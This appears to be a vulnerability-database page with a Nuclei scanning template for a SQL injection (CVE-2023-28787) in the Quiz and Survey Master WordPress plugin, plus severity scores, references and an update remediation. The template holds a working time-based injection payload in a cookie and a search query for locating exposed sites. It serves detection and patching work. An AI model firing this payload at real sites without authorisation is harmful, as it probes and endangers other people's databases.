/Vulnerability Library

Quiz and Survey Master <= 8.1.4 - SQL Injection

CVE-2023-28787
Verified

Description

ExpressTech Quiz And Survey Master (versions up to 8.1.4) contains an SQL injection caused by improper neutralization of special elements used in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires user interaction.

Severity

Critical

CVSS Score

8.6

Exploit Probability

2%

Published Date

February 6, 2026

Template Author

shivam kamboj

CVE-2023-28787.yaml
id: CVE-2023-28787

info:
  name: Quiz and Survey Master <= 8.1.4 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    ExpressTech Quiz And Survey Master (versions up to 8.1.4) contains an SQL injection caused by improper neutralization of special elements used in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires user interaction.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
  remediation: |
    Update to the latest version of Quiz And Survey Master that addresses this vulnerability.
  reference:
    - https://patchstack.com/articles/critical-unauthenticated-sql-injection-in-quiz-and-survey-master/
    - https://patchstack.com/database/wordpress/plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-8-1-4-unauthenticated-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28787
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-28787
    cwe-id: CWE-89
    epss-score: 0.0196
    epss-percentile: 0.78094
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/quiz-master-next"
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,quiz-master-next,qsm

http:
  - raw:
      - |
        @timeout: 30s
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: question_ids_1=1) AND SLEEP(8)-- -

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains_all(body, "quiz-master-next", "qsm_")'
        condition: and
# digest: 4a0a00473045022100d7192e4d487518a04e81d0d7a8d17815aed0eb54902273f4fdd202e23fe92298022017a6a023309190627c3da4ad9387d35deeeb5029c2a996dd6c4a057ed79e78a1:922c64590222798bb761d5b6d8e72950
8.6Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVE ID:
cve-2023-28787
CWE ID:
cwe-89

References

https://patchstack.com/articles/critical-unauthenticated-sql-injection-in-quiz-and-survey-master/https://patchstack.com/database/wordpress/plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-8-1-4-unauthenticated-sql-injection-vulnerabilityhttps://nvd.nist.gov/vuln/detail/CVE-2023-28787

Remediation Steps

Update to the latest version of Quiz And Survey Master that addresses this vulnerability.